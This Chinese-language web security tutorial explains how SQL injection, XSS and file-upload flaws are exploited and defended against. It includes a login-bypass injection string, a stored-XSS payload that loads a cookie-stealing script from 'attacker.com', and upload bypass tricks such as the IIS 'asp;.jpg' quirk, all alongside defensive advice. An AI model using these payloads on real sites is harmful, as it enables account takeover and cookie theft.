当前位置：首页 > news >正文

渗透测试视角：Web 应用常见漏洞的利用与防御策略

news 2025/7/26 21:07:05

Web 应用已成为企业业务的核心载体，但 SQL 注入、XSS、文件上传漏洞等安全问题频发。从渗透测试视角分析漏洞的利用原理，才能制定更有效的防御策略。本文将结合实战案例，解析 Web 应用常见漏洞的利用方式与防御方法。

SQL 注入是最常见的 Web 漏洞之一，攻击者通过在参数中插入 SQL 语句，操控数据库获取数据或执行命令。

漏洞原理与利用场景
当 Web 应用未对用户输入进行过滤，直接拼接 SQL 语句时易出现漏洞。例如，登录接口的 SQL 语句为：
SELECT * FROM users WHERE username='${username}' AND password='${password}'
攻击者输入username=' OR '1'='1，密码任意，语句变为：
SELECT * FROM users WHERE username='' OR '1'='1' AND password='任意'
因'1'='1'恒为真，可绕过登录验证。
进阶利用：通过UNION SELECT获取数据库版本、表名、字段名，甚至通过xp_cmdshell执行系统命令（需数据库权限较高）。
防御策略
- 使用预编译语句（PreparedStatement）或 ORM 框架（如 MyBatis），避免字符串拼接 SQL；
- 输入过滤：严格校验参数类型、长度，过滤' ; UNION等危险字符；
- 最小权限原则：数据库账号仅授予必要权限（如查询权限），禁止使用 root/admin 账号连接数据库；
- 定期审计：通过渗透测试验证过滤规则的有效性，避免被绕过。

XSS 漏洞允许攻击者在 Web 页面注入恶意脚本，当用户访问页面时，脚本在用户浏览器中执行，窃取 Cookie、篡改页面内容或诱导操作。

漏洞类型与利用方式
- 存储型 XSS：恶意脚本被存储在数据库中（如评论、个人资料），所有访问该页面的用户都会触发；
- 反射型 XSS：恶意脚本通过 URL 参数传递，仅当用户点击含恶意参数的链接时触发；
- DOM 型 XSS：通过修改页面 DOM 结构执行脚本，漏洞存在于前端 JavaScript 代码中。
实战案例：某论坛存在存储型 XSS 漏洞，攻击者在评论中插入<script src="http://attacker.com/steal.js"></script>，其他用户访问该评论时，Cookie 会被发送至攻击者服务器。
防御策略
- 输入过滤：过滤<script> onclick eval等危险标签和函数；
- 输出编码：将用户输入的内容在页面输出时进行 HTML 编码（如<转义为<）；
- 启用 CSP（内容安全策略）：限制脚本加载源，仅允许信任的域名加载脚本；
- 设置 Cookie 属性：添加HttpOnly（防止 JavaScript 读取 Cookie）、Secure（仅 HTTPS 传输）属性。

文件上传功能若未严格校验，攻击者可上传恶意脚本（如 “一句话木马”），获取服务器控制权。

漏洞利用方式
- 绕过文件类型校验：将.php文件改名为.jpg上传，再通过文件包含漏洞执行；
- 利用服务器解析漏洞：如 IIS 服务器对*.asp;.jpg的畸形文件名解析为 ASP 文件；
- 上传大文件消耗资源：通过上传超大文件耗尽服务器存储空间。
防御策略
- 严格校验文件类型：结合文件后缀、MIME 类型、文件头信息（如图片文件的FF D8 FF头）多重验证；
- 文件重命名：将上传文件重命名为随机字符串（如 UUID），避免攻击者猜测路径；
- 存储隔离：上传文件存储在非 Web 访问目录，或通过独立域名访问，禁止执行脚本；
- 限制权限：上传目录设置只读权限，禁止执行权限。